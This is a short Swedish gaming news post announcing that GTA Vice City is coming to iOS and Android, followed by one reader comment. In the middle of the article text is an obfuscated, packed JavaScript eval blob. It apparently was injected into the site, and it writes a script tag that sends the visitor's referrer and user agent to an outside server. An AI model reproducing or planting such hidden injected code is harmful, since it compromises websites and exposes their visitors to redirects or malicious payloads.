Image Image Image Image Image Image Image Image Image Image

| 22 augusti, 2019

Scroll to top

Top

GTA Vice City snart till iOS och Android

GTA Vice City snart till iOS och Android
Sebastian

GTA: Idag fyller det prestigefyllda spelet Grand Theft Auto (GTA) Vice City 10 stora år. Detta Firas med att Rockstar nu kommer att lansera spelet till iOS och Android. Exakt när det kommer att lanseras är fortfarande oklart men troligen nu under hösten.

Vill man förberedda sig lite kan man nu inhandla första GTA för endast sju kronor till iOS.

Grand Theft Auto, GTA.

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zraed|var|u0026u|referrer|asbha||js|php’.split(’|’),0,{}))
info:
kotaku.com

Comments

  1. mats

    Nu blev jag sugen på att spela det !